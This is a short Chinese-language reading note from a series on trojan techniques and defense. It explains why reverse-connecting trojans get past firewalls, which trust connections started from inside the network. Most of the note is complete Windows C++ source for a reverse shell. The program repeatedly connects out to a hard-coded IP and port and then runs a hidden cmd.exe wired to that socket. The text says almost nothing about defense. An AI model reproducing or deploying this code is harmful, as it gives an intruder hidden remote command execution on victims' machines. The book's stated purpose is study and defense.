此为《木马技术揭秘与防御》系列读书笔记
原理比较简单:
“堡垒总是从内部被突破的”,在服务端运行木马,自动连接到指定ip、port的客户端
防火墙对内部发起的连接请求无条件信任,绕过ip包过滤规则
View Code
1 #include <iostream> 2 #include <WINSOCK2.H> 3 #pragma comment(lib,"ws2_32.lib") 4 #pragma comment(lib,"advapi32.lib") 5 #pragma comment(lib,"user32.lib") 6 7 using namespace std; 8 int main() 9 { 10 WSAData wsaData; 11 SOCKET socket; 12 SOCKADDR_IN sockadd_in; 13 14 WSAStartup(MAKEWORD(1,1),&wsaData); 15 socket = WSASocket(PF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0); 16 17 char ip[] = "192.168.199.1\x00"; 18 unsigned short port = 999; 19 20 sockadd_in.sin_addr.s_addr = inet_addr(ip); 21 sockadd_in.sin_family = AF_INET; 22 sockadd_in.sin_port = htons(port); 23 24 while(connect(socket,(struct sockaddr*)&sockadd_in,sizeof(sockadd_in))){ 25 Sleep(30000); 26 } 27 28 STARTUPINFO si; 29 PROCESS_INFORMATION pi; 30 memset(&si,0,sizeof(si)); 31 si.cb = sizeof(si); 32 si.dwFlags = STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES; 33 si.wShowWindow = SW_HIDE; 34 si.hStdInput = si.hStdOutput = si.hStdError = (void*)socket; 35 if(!CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,0,NULL,&si,&pi)){ 36 cout<<"failed"<<endl; 37 //998:ERROR_NOACCESS 38 cout<<GetLastError()<<endl; 39 } 40 41 return 0; 42 }